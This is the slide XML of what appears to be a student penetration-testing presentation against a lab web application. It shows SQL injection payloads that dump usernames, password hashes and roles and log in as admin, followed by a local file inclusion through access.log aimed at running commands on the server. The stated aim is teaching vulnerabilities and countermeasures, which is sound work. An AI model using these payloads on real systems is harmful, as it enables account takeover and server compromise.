            <a:endParaRPr lang="en-US" sz="1700" b="1"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" err="1"/>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1"/>
              <a:t>: This retrieves column names.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1"/>
              <a:t> = 'users': Filters to only include columns from the users table.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1"/>
              <a:t> = database(): Ensures only the current database's columns are.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" b="1"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" b="1"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2C3443F-C164-8288-C2AC-0934A68F27A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7570839" y="1153667"/>
            <a:ext cx="3976788" cy="423062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7288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9083-720B-0B63-A779-63716500171C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643192" y="668028"/>
            <a:ext cx="3431919" cy="5215247"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>Find the user id and role, to find the admin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B6E5C89-B6CD-55BA-63EE-5AD7B91208F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4719485" y="668029"/>
            <a:ext cx="6828142" cy="3353365"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>' UNION SELECT username, password, role, id, name, NULL, NULL, NULL, NULL, NULL FROM users#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" b="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" b="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>This shows that the password is hashed but we can use the user id to sqli to the admin user</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0FCB14B-8A08-131C-5DAB-0D18D16A4A0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5112774" y="4441518"/>
            <a:ext cx="6434853" cy="125479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5167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926-B1DA-5081-3286-73ACF73C4BC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Login as Admin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8622F7BE-34FA-7D21-77E5-A827E1C2F090}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>‘or id=13#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D76272C-B555-8D3B-56D4-D04D099034AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5350329" y="1385730"/>
            <a:ext cx="4010585" cy="2257740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A436872D-0E3A-A63D-DA33-EE5721AD8E43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="303211" y="4229099"/>
            <a:ext cx="10744200" cy="680628"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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FA192ADF-F473-DAC0-EC30-2EDAA975B594}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2135056" y="4415969"/>
              <a:ext cx="747844" cy="306887"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="22" name="Ink 21">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA192ADF-F473-DAC0-EC30-2EDAA975B594}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="2117053" y="4397980"/>
                <a:ext cx="783490" cy="342505"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA4C4C0A-EE02-6C58-063B-153975630E1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="5833872"/>
            <a:ext cx="4171527" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Admin page is available for admin users.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="395862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34B9-2734-5D69-0970-CD1F1D95C0E2}"/>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Local file incusion (LFI)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="A screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F111734-0858-D4F2-AEF1-1A983101E077}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="301872" y="1840185"/>
            <a:ext cx="6683128" cy="2890453"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23117D40-0113-72A1-E38F-2C4C83B11027}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7112000" y="2260601"/>
            <a:ext cx="4892429" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Select any of the admin action and find that </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the webpage loads the file that the user input</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94DEBFC8-2254-39A2-FA7A-548C6DCD9BFE}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1865304" y="3705624"/>
              <a:ext cx="860760" cy="235800"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="14" name="Ink 13">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94DEBFC8-2254-39A2-FA7A-548C6DCD9BFE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="R4f656d1586a34d4b"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="1847304" y="3687624"/>
                <a:ext cx="896400" cy="271440"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F62E85BE-EFEF-18B6-22CB-9061BD2E3A72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="187572" y="5395653"/>
            <a:ext cx="7024663" cy="841189"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C33920A-1A53-BB14-152F-A3E7E60F45AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7581900" y="5577840"/>
            <a:ext cx="3902964" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change the page= to another pages to find LFI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="168023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25" name="Freeform: Shape 9224">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9218" name="Title 2"/>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altLang="en-US">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="2666999"/>
            <a:ext cx="9905998" cy="3124201"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1"/>
              <a:t>Our Porject is about exploring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1"/>
              <a:t> various aspects of penetration testing and vulnerability exploitation in systems and network environments. This will get us to find out different vulnerabilities, perform in-depth testing, document findings, and recommend effective countermeasures. We will use it to show other people how the vulnerabilities look like and how do we solve it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:endParaRPr lang="en-US" altLang="en-US" i="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503E-EFF8-C868-74DE-CBEA2384F1C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LFI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18C70844-B83F-5AE2-08BE-C865A6C0B75D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1689100"/>
            <a:ext cx="5938086" cy="4051300"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B719718-C2CA-D231-E76C-A5ABF5036E7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415685" y="2211359"/>
            <a:ext cx="5879592" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This URL shows that this webpage is vulnerable to local file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>incusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>From this vulnerability we find that there is a log folder with access.log file in it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22F07726-0AAB-62BA-F10E-C2A2D72EDC53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="415685" y="1795626"/>
            <a:ext cx="4620270" cy="504895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4180259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06A7-3A15-332F-9867-A7938221352B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>LFI , logs/access.log</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1398D8E7-6E38-5A02-BEE4-D93092560872}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069848" y="2121408"/>
            <a:ext cx="4773168" cy="4050792"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Use this URL to access the access.log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t> file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1"/>
              <a:t>http://192.168.23.129/fyp/admin.php?page=logs/access.log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Use this url to see access.log </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>File.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>This access.log file can be used to inject malitious code in it and run on the webserver machine.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04B345F1-1D0F-8957-6CB9-21BD56F4D61E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6355080" y="3151182"/>
            <a:ext cx="4773168" cy="2064395"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="600084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FB27-60D9-30BE-3960-4064C5C5369C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LFI,  Inject malicious code to run commands on the web-server.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{371D7B69-AA65-6FCE-9F9B-73FB8A82DDB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="1294605"/>
            <a:ext cx="9905998" cy="3124201"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We use the burp suite tool to do this part.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On the interception on the burp suite and capture the response.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
